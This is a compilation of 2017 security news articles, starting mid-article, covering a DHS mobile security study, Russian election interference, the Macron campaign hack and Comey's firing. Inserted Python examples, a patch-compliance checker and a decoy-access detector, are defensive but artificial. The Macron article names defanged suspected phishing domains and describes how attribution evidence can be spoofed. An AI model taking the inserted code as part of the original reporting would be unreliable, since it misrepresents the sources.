The study details five primary components of the mobile ecosystem (mobile device technology stack, mobile applications, mobile network protocols and services, physical access to the device, and enterprise mobile infrastructure), as well as the attack surface for each of them. The report provides Congress with a view of the mobile security threats government workers face, while noting that defenses must cover the entire threat surface, not only the categories these threats fall into.

According to DHS’ Study on Mobile Device Security (PDF), mobile operating system providers have made advances, mobile device management and enterprise mobility management systems offer scrutiny and security configuration management, and best practices guides issued both by NIST and private industry further improve the landscape. Despite that, communication paths that remain unprotected create vulnerabilities, new fifth-generation network protocols require additional hardening, and further research is still needed, the report says.

Mobile operating systems

Currently the most popular mobile operating system out there, Android is seeing improvements to its security patch lifecycle, courtesy of an “Android security patch level” indicator that Google introduced several months ago. Because security fixes are delivered monthly, users and enterprises can easily assess the security state of their devices simply by looking at the patch level.

Google is pushing patches quickly to Nexus and Pixel devices and multiple manufacturers have already committed to distributing these fixes in a timely manner, but most Android devices in use remain unpatched for long periods of time, the report notes. This was also the conclusion of a June 2016 report from Duo Security, which revealed that, while most Android devices were eligible to receive updates, only a very small percentage actually got them.

“These security architecture improvements across all the mainstream mobile and PC operating systems (Google’s Android and Apple’s iOS as well as Microsoft’s Windows and other operating systems) are to be encouraged and applauded because they increase resilience to attack and raise the level of difficulty and the cost for attackers to discover vulnerabilities and develop exploits. Nevertheless, sufficiently motivated parties will continue to find exploitable vulnerabilities in mobile operating systems and other lower-level device components,” the report reads.

Additionally, there’s the issue of zero-day vulnerabilities, which have large monetary values associated, and which could be used by advanced attackers against high-value targets where the investment is justified (the Pegasus iOS malware serves as a great example). Apple and Google offer significant monetary rewards to researchers who disclose such flaws, but large prizes such as Zerodium’s $1.5 million for an exploitable zero-day in Apple iOS might seem more appealing.

Devices with unlocked bootloaders are more exposed to attacks, the same as jailbroken or rooted devices, which represent a major issue when used within enterprise environments. Thus, enterprises should advise employees not to root or jailbreak their devices, and should also ensure that the latest available patches are installed on all devices, thus keeping them safe from publicly known security vulnerabilities.
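The report's two pieces of operating-system advice (check the patch level, keep rooted or bootloader-unlocked devices out of the enterprise) can be turned into a simple compliance check of the kind an EMM/MDM policy engine runs. The following is an added example, not code from the DHS/NIST report or from any EMM product; it assumes the patch level is collected as the `ro.build.version.security_patch` system property (a `YYYY-MM-DD` string), and the device inventory and 90-day policy window are constructed for illustration.

```python
"""Fleet compliance check based on the Android security patch level.

Added example (not from the DHS/NIST report). In practice the patch
level is read from each device with
    adb shell getprop ro.build.version.security_patch
and the root/bootloader flags come from the EMM agent; here both are
supplied in a constructed inventory so the check runs offline.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import date

# Policy (assumed): Google ships Android security fixes monthly, so a
# device whose patch level trails the reference date by more than this
# many days is treated as unpatched.
MAX_PATCH_AGE_DAYS = 90


@dataclass
class Device:
    device_id: str
    security_patch: str  # value of ro.build.version.security_patch
    rooted: bool = False
    bootloader_unlocked: bool = False


@dataclass
class Finding:
    device_id: str
    issues: list[str] = field(default_factory=list)

    @property
    def compliant(self) -> bool:
        return not self.issues


def parse_patch_level(value: str) -> date | None:
    """Parse a YYYY-MM-DD patch level; None if missing or malformed."""
    try:
        return date.fromisoformat(value.strip())
    except (ValueError, AttributeError):
        return None


def evaluate_device(dev: Device, today: date) -> Finding:
    """Apply the patch-age and integrity rules to one device."""
    finding = Finding(dev.device_id)
    patch = parse_patch_level(dev.security_patch)
    if patch is None:
        # Devices predating the indicator, or a tampered build, report nothing.
        finding.issues.append("patch level missing or unparseable")
    else:
        age = (today - patch).days
        if age > MAX_PATCH_AGE_DAYS:
            finding.issues.append(f"security patch level {patch} is {age} days old")
    if dev.rooted:
        finding.issues.append("device is rooted")
    if dev.bootloader_unlocked:
        finding.issues.append("bootloader is unlocked")
    return finding


def evaluate_fleet(devices: list[Device], today: date) -> list[Finding]:
    return [evaluate_device(d, today) for d in devices]


def noncompliant_ids(devices: list[Device], today: date) -> list[str]:
    """Sorted ids of devices that fail at least one rule."""
    return sorted(f.device_id for f in evaluate_fleet(devices, today) if not f.compliant)


# Constructed sample inventory (not real devices).
SAMPLE_FLEET = [
    Device("pixel-01", "2017-05-05"),                 # current
    Device("nexus-02", "2016-11-01"),                 # six months behind
    Device("oem-03", "2017-04-01", rooted=True),      # patched but rooted
    Device("legacy-04", ""),                          # no patch level at all
]
REFERENCE_DATE = date(2017, 5, 13)  # the article's publication date

if __name__ == "__main__":
    for f in evaluate_fleet(SAMPLE_FLEET, REFERENCE_DATE):
        status = "OK" if f.compliant else "NON-COMPLIANT"
        print(f"{f.device_id:10} {status}: {'; '.join(f.issues) or 'no issues'}")
```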

Mobile applications

Most mobile applications are available to users via dedicated portals, such as the Apple App Store and Google Play (each with around two million apps), but third party stores also exist, and some of them are non-legitimate sources of applications. Furthermore, the reliability and security of applications distributed through these stores may vary, especially since the vetting process is more opaque or less robust when compared to that of the public stores of OS vendors.

Applications pose security risks because of vulnerabilities that could be exploited or because they have been created for malicious purposes. Some of the vulnerabilities could expose users to excessive risks, and these include: insecure network communication, insecure file permissions/unprotected location when storing files, sensitive information written to system log, web browser flaws, vulnerabilities in third-party libraries, and cryptographic vulnerabilities.

App provenance is important when considering defenses against apps with inherent vulnerabilities, especially when it comes to software used by the Federal Government (which includes apps commissioned or built specifically for internal or external use and commercially available apps). App developers should follow security best practices and use mobile application vetting tools, enterprises should deploy and maintain Enterprise Mobility Management/Mobile Device Management (EMM/MDM) tools, and threat intelligence should be used to understand the potential risks associated with apps installed on devices, the report notes.

Malicious or privacy-invasive applications, on the other hand, are often focused on exploiting vulnerabilities in the operating system. These include apps that gather privacy-sensitive information, eavesdropping apps, programs that exploit flaws in other apps or access to sensitive enterprise networks or data, ransomware, software meant to enable fraud, rooting/jailbreaking apps, programs that manipulate trusted apps, or exploit public mobile app stores.

Mobile networks

“Vulnerabilities in this element of the mobile ecosystem are the most difficult to remediate because they are an intrinsic part of the design and operation of live cellular networks. Attempts to fix or update deployed systems can lead to outages that can affect the entire country,” the report reads. “It is important to note that each generation and family of mobile networks is a unique implementation and is not forward or backward compatible.”

Evolved from GSM through UMTS, Long Term Evolution (LTE) represents the most recent generation of radios used in mobile phones and is significantly more advanced than previous standards. However, GSM is still in use and will continue to be at least for the next three years, and LTE inherits some of the GSM architectural weaknesses, which creates security risks for all users. To that, one can add the attack surface that Signaling System 7 (SS7) opens (recently abused to steal money from bank accounts).

Threats to consider at the network level include those related to SIM cards (theft, cloning, or stealing cryptographic keys), radio access networks (jamming or denial of service, physical attacks on base station infrastructure), LTE (downgrade attacks, eavesdropping, device and identity tracking, prevention of emergency phone calls, network level denial of service), backhaul networks (eavesdropping), core networks (attacks against SS7), and external networks.

Device physical access

Once an attacker has physical access to a device, they can potentially obtain data, access it, or modify it, depending on the configuration of the device. Many people don’t use a passcode, pattern, or Personal Identification Number (PIN) on their devices, which means their data is exposed if their devices are lost or stolen. Recently, the addition of fingerprint sensors on devices has encouraged users to add a screen lock passcode, which is required for enabling the sensor, the report notes.

While the activation lock capabilities that Apple and Google added to mobile devices prevent actors from factory resetting lost or stolen devices, other physical attack vectors do exist, such as USB attacks. Also possible are scenarios where the mobile device is used to spread malware when connected to a computer.

Mobile enterprise

“Mobile devices do bring new threats to enterprises and can be used to target enterprise systems. Mobile devices form a unique class of end user equipment that frequently moves inside and outside of enterprise networks. This movement means that mobile devices compromised elsewhere can be used as vectors to compromise other enterprise devices or even the enterprise,” the study notes.

Incidents where malware spread from Android devices to other systems are becoming more frequent. This happens when a user attempts to charge a compromised device through an available USB port although they shouldn’t. The recently discovered DressCode Android malware was observed attempting to infect enterprise networks through compromised mobile devices.

Attackers can target EMM – technologies that help IT admins to control and manage mobile data, mobile devices, and their connections with enterprise resources – to gain unauthorized access to the admin console, or can impersonate an EMM server, allowing them to track users, access all mobile devices, or install malware for further attacks.

Private mobile application stores that enterprises use to manage and distribute software face threats as well: “impersonation or unauthorized use of administrator credentials, app developer credentials, or distribution certificates. Bypass or subvert application security analysis or vetting techniques,” the report reads. This could allow attackers to distribute enterprise apps to third-parties, and modify apps or deploy malicious apps to facilitate further attacks.

Emerging threats

In addition to the above, the report identified a series of probable emerging threats, which fall into the following categories: Open Source Signals Intelligence; Advances in decryption of cellular network authentication and privacy standards in the public sector; Advances in “IMSI Catcher” capabilities; Increasingly sophisticated cybercrime and fraud targeting individuals and corporations; and Increasing use of broad spectrum jamming by citizens seeking privacy.

Focused on identifying gaps in current defenses that require further research or improvement, the report also delivers a framework to help identify attacker tactics and techniques, and points out areas where current mitigations can’t properly protect mobile devices. Further, the report analyzes emerging threats, lists mobile security best practices collected from NIST and other government and non-government organizations, and also points out weaknesses in SS7 and Diameter.

“Threats to the Government’s use of mobile devices are real and exist across all elements of the mobile ecosystem. This is evident from the threat assessment conducted for this study and documented in the previous sections. The corresponding analysis of available defenses shows that despite significant advances in addressing both deliberate and accidental threats to mobile security, gaps remain that will command additional effort by Government and industry to reduce the risk of using mobile technologies,” the report reads.


Trump's Intel Bosses Reiterate: Russia Meddled in Election

12.5.2017 securityweek BigBrothers
Six top US intelligence officials told Congress Thursday they agree with the conclusion that Russia acted to influence last year's election, countering President Donald Trump's assertions that the hacking remains an open question.

Asked whether they believed the intelligence community's January assessment that Russia was responsible for hacking and leaking information to influence the elections was accurate, all six spy and law enforcement bosses appearing before the panel said "yes."

They included Director of National Intelligence Dan Coats, CIA director Mike Pompeo and acting FBI director Andrew McCabe, newly installed after Trump fired the agency's chief James Comey this week.

In an overview, Coats told the panel: "We assess that Russia is likely to be more aggressive in foreign global affairs, more unpredictable in its approach to the United States, and more authoritarian in its approach to domestic policies and politics."

He also cited and quoted the intelligence community's annual "Worldwide Threat Assessment" released today, which details past, present and future threats from Russia.

"Moscow has a highly advanced offensive cyber program, and in recent years the Kremlin has assumed a more aggressive cyber posture," it says.

"This aggressiveness was evident in Russia's efforts to influence the 2016 US election, and we assess that only Russia's senior-most officials could have authorized the 2016 US election-focused data thefts and disclosures, based on the scope and sensitivity of the targets."

The assessment comes amid a mushrooming crisis for the Trump team as questions swirl over why the president fired his FBI director, who was overseeing an investigation into Russian election meddling and possible connections between Trump campaign associates and Russia last year.

Trump has repeatedly denounced as "fake news" the accusations that members of his circle coordinated or colluded with Russian officials.

Asked again late last month in a CBS News interview whether he believes Russia tried to interfere in the election, Trump said "I don't know... Could've been China, could've been a lot of different groups."


'Risk': Inside the Inner Sanctum of Wikileaks' Assange

12.5.2017 securityweek BigBrothers
The enigmatic champion of a global movement for transparency and democracy. A Russian stooge. A West-hating attention-seeker. A cold fish with questionable attitudes and alleged diabolical sexual mores.

Julian Assange has been labeled all of these -- and many things besides -- since starting out as a media-savvy Robin Hood figure, wrestling facts from the powerful and serving them up unexpurgated for the masses.

Now, a fugitive from justice dogged by accusations of sexual assault and living a hermetic existence in London's Ecuadoran embassy for the last five years, he cuts a more embattled, slippery figure.

"Risk," a new documentary by Oscar-winning filmmaker Laura Poitras, starts out as an unsettlingly ambivalent portrait of the award-winning iconoclast but ends up revealing a darker side to Assange.

Filmed over six tumultuous years and taking in the 2016 US presidential election, it takes viewers closer than any previous film crew into Assange's inner sanctum.

"This is not the film I thought I was making. I thought I could ignore the contradictions, I thought they were not part of the story. I was wrong. They are becoming the story," Poitras says in a voiceover.

US cable network Showtime announced in April it had partnered with Neon to roll out the film at 36 US locations during May, before a television premiere later in summer.

WikiLeaks, founded by Assange in 2006, specializes in large-scale breaches of classified data that have made headlines around the world, as well as challenging the ethics of security services.

The 45-year-old computer programmer has claimed political asylum at the Ecuadoran embassy in London since 2012, having taken refuge to avoid being sent to Sweden.

- Misogyny -

There is an international arrest warrant out to get him to face allegations of unlawful coercion, sexual molestation and rape dating back to 2010.

Poitras's profile of Assange, who denies any wrongdoing, is a follow-up to her Academy Award-winning "Citizenfour" (2014), about fugitive leaker Edward Snowden and the NSA spying scandal.

Perhaps the most remarkable aspect of "Risk" is its success in shedding light on the ugly misogyny that runs through so much of the tech world, showing Assange describing the sexual assault allegations against him as the product of a feminist conspiracy.

He even suggests that if the alleged victims said sorry to him, he would "apologize for anything I did or didn't do to hurt their feelings."

"Risk" also gets up-close with security expert and close Assange ally Jacob Appelbaum, revealing that he is also facing accusations of sexual misconduct, which he too denies.

Assange doesn't accept that he and Poitras fell out, but appears through messages she reads out on camera to become colder with her, bruised by the fact that she didn't use WikiLeaks to publish Snowden's NSA material.

"That kind of created I think, as you see in the film, a tension between myself and Julian," the 53-year-old said during a Q&A following the North American premiere at the Art of the Real festival in New York last week.

At its height, WikiLeaks could claim to have provided valuable insights into the war on terror, helped bring about the Arab Spring and shone a light on civilian deaths in Iraq.

- Potent force -

Regardless of Assange's plummeting stock in the bourse of public opinion, the organization he founded remains undeniably relevant -- a potent force in geopolitics.

"Risk" underlines its continued influence in the confusion surrounding Assange's intervention in the US presidential election, and his suspected ties with Russia and with members of the Trump campaign.

In July WikiLeaks published 20,000 hacked emails from the Democratic National Committee, some innocuous but others hugely damaging to Hillary Clinton's presidential campaign.

By October, WikiLeaks was publishing thousands of emails from Clinton's campaign chairman, John Podesta, prompting effusive praise from then-candidate Donald Trump.

Assange denies that Russia or any other state was behind the leak.

Despite its focus on the murky world of espionage, "Risk" does have its lighter side, including a hilarious cameo by Lady Gaga paying a visit to Assange.

But had Poitras filmed for a few more months, her documentary could have had a romantic coda.

In a bizarre twist in the Assange saga, ex-Baywatch star Pamela Anderson has recently emerged as a rumored love interest of the secretive Australian, and in a poem posted on her website she complains about the "narrow lens Laura has picked."

The 49-year-old actress has reportedly visited the fugitive several times in recent months.


DHS Funds Smartphone Authentication Projects

11.5.2017 securityweek BigBrothers
The U.S. Department of Homeland Security (DHS) is funding three smartphone digital identity and privacy projects including mobile device attribute verification, mobile authentication, and physical access control. A total of $2.4 million was awarded to the Kantara Initiative, and these three projects are the first to be launched by the Kantara Identity and Privacy Incubator Program (KIPI).

The three KIPI projects involve Mobile Device Attribute Verification (MDAV) from Lockstep Technologies, Australia; Emergency Responder Authentication System for Mobile Users (ERASMUS) from Gluu Inc, USA; and Derived Credentials and NFC for Physical Access Control from Exponent Inc, USA.

"The basis for each project," commented Kantara's executive director, Colin Wallis, "is a unique re-configuration of emerging next generation standards and specifications delivered through mobile devices, like smartphones. The trend of leveraging the ubiquitous mobile device for digital identity solution continues to ramp worldwide. We are seeing a growing interest in incubator programs like KIPI."

Lockstep's MDAV uses certificates to ensure secure attributes, attribute sources and devices. Certificates are already used by many security departments to verify users' mobile devices; but developing an application to deliver the process widens its applicability.

"Potential applications," says Kantara, "include credentials for first responders, value added mobile driver's licenses, anonymous proof of age, clinical trial and e-health record confidentiality, electronic travel documentation, and privacy-enhanced national IDs."

Gluu's ERASMUS is designed for multiple autonomous organizations who need to share up-to-date information about a person's identity, skills and authorizations. It is, suggests Kantara, "especially relevant in the emergency responder community, where state, local and federal government organizations need to collaborate both in person and online."

Noticeably, ERASMUS is also the first implementation of Kantara's nascent Open Trust Taxonomy for Federation Operators (OTTO) standard.

The Exponent project is the development of smartphone NFC capabilities for physical access control. "The employee uses the phone in the same way as their physical Personal Identity Verification (PIV) Card to access a building," explains Kantara, "but the phone implementation provides improved convenience as well as options for difficult use cases such as a lost/stolen card or temporary credentials for non-PIV Card holders."

The MDAV and Exponent projects will improve smartphone authentication options that are already being used by some companies -- in essence, they will make such authentication easier, better and more accessible to security teams.

ERASMUS is a little different in that it delivers federated identity suitable for multiple organizations. In some ways, it is a poor man's NSTIC, the Obama-initiated National Strategy for Trusted Identities in Cyberspace, designed to develop an identity ecosystem suitable for everyone, throughout the US.

One possible outcome of multiple identity/authentication projects is a fragmentation of the problem when all effort should be concentrated on a global solution such as NSTIC (or an alternative such as Identity 3). Kantara's Wallis doesn't accept this. "We do have various solutions in use but I don't believe fragmentation is a problem per se," he told SecurityWeek. "How else is progress made? Solutions are developed and tested. They go through their lifecycle and improvement updates are made until one is adopted. We are seeing that process with these three authentication projects."

But there does remain one issue. Not all security practitioners feel able to adopt smartphone-based authentication solutions because not all users have smartphones. This is particularly relevant for blue-collar industries and some multi-nationals. "There's no way around it," said Wallis. "You need a smartphone for the advanced authentication we are talking about here." But, he adds, "Various analysts report that by 2020 there will be six billion smartphones in use. So, the problem of smartphone availability could solve itself. In the meantime, alternative authentication approaches to smartphones to consider include SMS, and voice authentication."


Who Hacked French President-elect Emmanuel Macron's Campaign?

11.5.2017 securityweek BigBrothers
One thing is clear. The campaign of French President-elect Emmanuel Macron was hacked prior to the French presidential election this last Sunday -- and the finger was immediately pointed at Russia's APT28 (Fancy Bear). Russia has been caught meddling in western politics once again.

Evidence of APT28 involvement seems to come from three sources: the U.S. National Security Agency (NSA), security researchers, and circumstantial evidence. The NSA was quick to blame Russia via a Senate Armed Services Committee hearing on Tuesday this week. The head of the NSA, Admiral Mike Rogers, told the committee that the NSA had warned its French counterparts at the time of the hack: "Look, we're watching the Russians, we're seeing them penetrate some of your infrastructure." The Russians are here.

Evidence from security researchers focuses on two areas: phishing sites and leaked document metadata. One phishing site, apparently created by APT28 on March 25, 2017 and clearly designed for the Macron campaign, 'onedrive-en-marche-dot-fr', was reported by Trend Micro in April. Other sites apparently tied to the APT28 infrastructure include portal-office-dot-fr, accounts-office-dot-fr and mail-en-marche-dot-fr -- and another with the surprising name of totally-legit-cloud-dot-email.

The document evidence includes the discovery of Cyrillic characters within some documents apparently leaked by the hackers. WikiLeaks tweeted on Saturday (the day before the French presidential vote), "#MacronLeaks assessment update: several Office files have Cyrillic meta data..." The obvious assumption is that Russian APT hackers altered the files before leaking them.

But while clearly suggesting possible APT28 involvement in the hack, French security researcher x0rz has demonstrated that neither of these can be taken as actual proof. In a blog post on Tuesday, he demonstrated the ease with which anybody could edit metadata and pretend to be anyone. He went further to explain how "I setup my own domain mimicking some APT28 artefacts: totally-legit-cloud-dot-email that has been registered using the same information as another APT28 phishing domain used during the attack on EM staff... This domain (that I own) is now linked with actual APT28 infrastructure according to some threat intelligence OSINT tools" (eg, threatcrowd.org).

In other words, anyone could have established the APT28-related phishing domains, and anyone could have planted Cyrillic characters in the metadata. x0rz believes that all this proves is that it might have been APT28, but it might not have been APT28.

The circumstantial evidence is that the hack follows the basic pattern used by (what everybody believes to have been) APT28 in the US election hacks: phish for the emails of the candidate you want to lose, and then leak them. This evidence claims that since this is what APT28 does, and this is what Russia would want, then therefore this was done by Russia.

But the parallel is not perfect. The Macron hack occurred far later in the election campaign than the DNC hack; the phishing emails appear to be far clumsier; and the email leak occurred too late to have any effect on the election outcome.

The Macron campaign's answer to this is that they were expecting hackers, that they knew they would not be able to prevent a hack, and they prepared for it with what amounts to the 'deception defense'. The New York Times reported, "'We created false accounts, with false content, as traps. We did this massively, to create the obligation for them to verify, to determine whether it was a real account,' Mr. Mahjoubi [the campaign's digital director] said. 'I don't think we prevented them. We just slowed them down,' he said. 'Even if it made them lose one minute, we're happy'."

SecurityWeek talked to Kevin Eley, VP EMEA at TrapX, about the deception defense. In full, it amounts to the installation of a honeypot-like platform within the customer's infrastructure. Attackers are diverted towards the false shares, false databases, false structure -- and as soon as anything attempts to access them, the existence of an intruder is confirmed. The intrusion can then be tracked back to its source and the vulnerability closed. And if the intruder does manage to exfiltrate any data, it is false data.

"In the Macron hack," he told SecurityWeek, "the deception seems to be at the data level only." He confirmed that although this could not have been achieved by the campaign on the fly, it could have been done well in advance anticipating a hack. In other words, it can explain but does not prove why the leak occurred so late -- the attackers simply didn't know what to leak.
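The detection side of the deception defense described above, as an added example that is not TrapX's code or the Macron campaign's: a registry of decoy shares and decoy accounts (all names constructed here) is checked against constructed share-access log lines, and any touch of a decoy, allowed or denied, becomes an alert naming the source host. The log format and field names are assumptions for this example.

```python
import re
from collections import Counter

# Constructed decoy inventory: these shares and accounts exist only to be touched by an intruder.
# No legitimate workflow references them, so any access is high-confidence signal.
DECOY_SHARES = {r"\\fs01\finance-archive", r"\\fs01\hr-legacy"}
DECOY_ACCOUNTS = {"svc-backup-old", "jdoe-contractor"}

# Assumed log format for this example (not a real product's format):
#   <timestamp> share-access src=<ip> user=<account> share=<unc path> result=allowed|denied
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) share-access src=(?P<src>\S+) user=(?P<user>\S+) "
    r"share=(?P<share>\S+) result=(?P<result>\S+)$"
)

# Constructed sample log: one host goes about normal work, another touches two decoys.
SAMPLE_LOG = r"""
2017-05-05T22:41:03Z share-access src=10.0.8.14 user=m.dupont share=\\fs01\campaign-docs result=allowed
2017-05-05T22:41:09Z share-access src=10.0.8.14 user=m.dupont share=\\fs01\campaign-docs result=allowed
2017-05-05T23:02:51Z share-access src=10.0.8.77 user=m.dupont share=\\fs01\finance-archive result=allowed
2017-05-05T23:02:58Z share-access src=10.0.8.77 user=svc-backup-old share=\\fs01\hr-legacy result=denied
2017-05-05T23:10:12Z share-access src=10.0.8.14 user=m.dupont share=\\fs01\campaign-docs result=allowed
""".strip().splitlines()


def parse_line(line):
    """Parse one access record; return None for lines that do not match the format."""
    m = LOG_LINE.match(line.strip())
    if m is None:
        return None
    ev = m.groupdict()
    # Normalise case so \\FS01\Finance-Archive still matches the decoy list.
    ev["share"] = ev["share"].lower()
    ev["user"] = ev["user"].lower()
    return ev


def detect_decoy_access(lines):
    """Return an alert for every record that touches a decoy share or decoy account.

    A denied access counts too: the point of a decoy is that nobody should even try.
    """
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = []
        if ev["share"] in {s.lower() for s in DECOY_SHARES}:
            reasons.append("decoy share")
        if ev["user"] in {a.lower() for a in DECOY_ACCOUNTS}:
            reasons.append("decoy account")
        if reasons:
            alerts.append({
                "ts": ev["ts"],
                "src": ev["src"],
                "user": ev["user"],
                "share": ev["share"],
                "result": ev["result"],
                "reasons": reasons,
            })
    return alerts


def suspicious_sources(alerts):
    """Count alerts per source host: the hosts to isolate and trace back first."""
    return dict(Counter(a["src"] for a in alerts))


if __name__ == "__main__":
    found = detect_decoy_access(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} ALERT src={a['src']} user={a['user']} share={a['share']} "
              f"result={a['result']} ({', '.join(a['reasons'])})")
    print("sources to investigate:", suspicious_sources(found))
```

Because decoys carry no legitimate traffic, the detector needs no thresholds or baselining; the cost of the approach is keeping the decoy inventory in sync with what is actually deployed, and keeping it out of any document an intruder could read.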

Just to confuse the issue further, Tyler Durden, discussing the Shadow Brokers' most recent leaks, writes today on zerohedge, "Inside the NSA dump among many other findings, we find hundreds of NSA attacks on China, as well as penetration attempts in which the NSA 'pretends' to be China so one wonders how difficult it would be for the NSA to pretend they are, oh, say Russia?"

So, who did hack Macron? The obvious conclusion is Russia; because Russia would benefit most from a Le Pen victory. But the timing of the document leaks was far too late to benefit Le Pen, and would more likely benefit Macron. The Occupy Movement could alternatively say that the 1% would benefit from an ex-Rothschild banker (Macron); just as they would benefit from a Republican president and a City of London not controlled by Brussels. It is not just Russia that has an incentive in meddling.

"As far as attribution related to the hacks Macron's campaign suffered, or the origins of the stolen documents," F-Secure researcher Andy Patel told SecurityWeek, "fingers are being pointed based on 'who would/wouldn't do something like this?' by people who don't have access to enough evidence to be 100% certain of anything."

The bottom line is that we do not know who hacked Macron, nor why. It might have had nothing to do with discrediting Macron per se, but merely to add to the current confusion over real and fake news on the internet. "If it's information warfare -- rather than cyber warfare," suggests F-Secure security advisor Sean Sullivan, "then the point is not stealth. It's to make the point that your systems are under attack, your options are limited, and you always need to be on your guard. And there's nothing you or your leaders can do to stop us!

"Nothing is certain. But that's probably also exactly the goal of the information warfare, to get you to believe in nothing."


President Donald Trump Fires the FBI Director James Comey
11.5.2017 securityaffairs BigBrothers

President Trump on Tuesday fired the director of the F.B.I., James B. Comey, due to the FBI’s investigation into alleged links between Trump and Russia.
The news has shocked the media, President Donald Trump has fired the director of the Federal Bureau of Investigation, James Comey. The most popular opinion is that Comey was fired due to the FBI’s investigation into alleged links between Trump and Russia.

Last Wednesday, Comey testified before Congress about the role of the Kremlin in influencing the 2016 US Presidential election with cyber attacks against the DNC.

The way Comey was informed was absurd; he was making a speech in Los Angeles when he received the news.

According to the White House, Comey was fired on the “clear recommendation” of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, officially because he was no longer able to lead the bureau effectively.
“While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau,” Trump wrote in a termination letter to the FBI Director.

Peter Alexander @PeterAlexander
BREAKING: Full letter from Trump to Comey says former FBI Director "not able to effectively lead the Bureau."
11:54 PM - 9 May 2017
US Deputy Attorney General Rod Rosenstein explained that Comey was fired due to the way the FBI investigated the case related to the disclosure of Hillary Clinton‘s emails.

Rosenstein also blamed Comey for his decision to close this investigation without prosecution.

Rosenstein’s memo did not explicitly refer to the investigation conducted by the FBI into the cyber attacks against US politicians during the 2016 US Presidential election.

Trump’s decision was criticized by the media and of course by the US Democrats, who called the decision a “Nixonian” move.

Democrats speculate that Comey’s firing is linked to the investigation into alleged support offered by Russian APT groups.
Tim Kaine, Senator from Virginia and former Democratic vice presidential nominee, said Comey’s firing proved “how frightened the Admin is over Russia investigation,” arguing that the firing was “part of a growing pattern by White House to cover-up the truth.”

Senator Tim Kaine @timkaine
Trump firing Comey shows how frightened the Admin is over Russia investigation
12:16 AM - 10 May 2017

Below is a tweet shared by the American Civil Liberties Union (ACLU):

ACLU National @ACLU
In America, no one is above the law. Firing people who question authority is done by dictators, not democratically-elected presidents. https://twitter.com/nytimes/status/862332770177208321 …
6:26 PM - 10 May 2017
Below is the opinion of the NSA whistleblower, Edward Snowden, who condemned the termination:

Edward Snowden @Snowden
This FBI Director has sought for years to jail me on account of my political activities. If I can oppose his firing, so can you. https://twitter.com/Snowden/status/862067649748119553 …
12:17 AM - 10 May 2017
Trump has appointed FBI Deputy Director Andrew McCabe to serve as an interim FBI director.


Trump Fires FBI Director Over Clinton Probe, Amid Russia Investigation
10.5.2017 thehackernews BigBrothers
President Donald Trump has abruptly fired James Comey, the director of the Federal Bureau of Investigation (FBI) who was leading an investigation into alleged links between Trump and Russia.
The White House announced on Tuesday that Comey was fired on the "clear recommendation" of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, citing the reason that he was no longer able to lead the bureau effectively.
"While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau," Trump wrote in a termination letter to Comey.
Later a memo from the US deputy attorney general Rod Rosenstein explained that Comey was fired as director of the FBI over mishandling of the inquiry into Hillary Clinton's emails, including his decision to close this investigation without prosecution.
However, the memo doesn't mention the FBI investigation into possible links between the Trump campaign and the Russian government.
Mr. Comey was delivering a speech in Los Angeles when he learned that Trump had fired him, and initially he thought it was a fairly funny prank.
Comey's Firing has Drawn Wide Criticism
The move stunned Washington and raised suspicions among Democrats, who called it a "Nixonian" move by Trump.
Democrats quickly suggested that Comey's firing may have more to do with 'investigation into Trump's ties with Russia' than with the Hillary email scandal.
Last Wednesday, Comey testified before Congress about Russia's role in influencing the 2016 U.S. presidential election.
Tim Kaine, Senator from Virginia and former Democratic vice presidential nominee, made a series of tweets, saying Comey's termination proved "how frightened the Admin is over Russia investigation," arguing that the firing was "part of a growing pattern by White House to cover-up the truth."
Here's a statement from American Civil Liberties Union (ACLU) Executive Director Anthony D. Romero:
"The independence of the FBI director is meant to ensure that the president does not operate above the law. For President Trump to fire the man responsible for investigating his own campaign’s ties to the Russians imperils that fundamental principle.
Regardless of how one judges the performance of James Comey in either the Hillary Clinton or Russia investigations, President Trump's dismissal of a sitting FBI director raises serious alarm bells for our system of checks and balances."
Meanwhile, Senate Minority Leader Chuck Schumer called for an independent investigator to take over the Russia probe.
Even NSA whistleblower Edward Snowden condemned the termination, despite the fact that Comey "has sought for years to jail me on account of my political activities," he tweeted.
"Set politics aside: every American should condemn such political interference in the bureau's work" — Edward Snowden.
Trump has appointed FBI Deputy Director Andrew McCabe to serve as interim director until a replacement is found for Comey, who had served the FBI for the last 27 years and was appointed to the director's position by President Barack Obama in 2013.


Trump Fires FBI Director James Comey

10.5.2017 securityweek BigBrothers
FBI Director James Comey

US President Donald Trump on Tuesday fired his FBI director James Comey, the man who leads the agency charged with investigating his campaign's ties with Russia -- a move that sent shockwaves through Washington.

The surprise dismissal of Comey, who played a controversial role in last year's presidential election, came as he was leading a probe into whether Trump's aides colluded with Moscow to sway the November vote.

Top Senate Democrat Chuck Schumer said he told Trump he was making a "big mistake" by dismissing Comey, a move that prompted parallels with a decision by a crisis-plagued Richard Nixon to fire his attorney general.

Trump "has accepted the recommendation of the attorney general and the deputy attorney general regarding the dismissal of the director of the Federal Bureau of Investigation," his spokesman Sean Spicer told reporters.

A search for a new FBI director was to begin "immediately," the White House said.

In a letter, Trump told Comey: "You are hereby terminated and removed from office, effective immediately."

"While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau."

"It is essential that we find new leadership for the FBI that restores public trust and confidence in its vital law enforcement mission," Trump said.

The stated reason for Comey's dismissal -- according to a memo from Deputy Attorney General Rod Rosenstein that was circulated by the White House -- was for mishandling the probe into Democratic presidential hopeful Hillary Clinton's emails.

But his sacking raised immediate questions about Trump's motives.

FBI directors are appointed for a single 10-year term. The 56-year-old Comey, who is popular among rank-and-file agents, was appointed four years ago.

He played an outsized -- and controversial -- role on the American political stage over the past year, lobbing one bombshell after another that rankled both parties in Washington.

Clinton accused Comey of trashing her chances of becoming president by revealing a renewed investigation into her email use.

Comey told lawmakers last week he felt "mildly nauseous" at the thought that he had swayed the election -- but could not have acted any other way.

- 'Nothing less than Nixonian' -

Since the start of Trump's presidency, the FBI chief had increasingly appeared to be a thorn in the president's side.

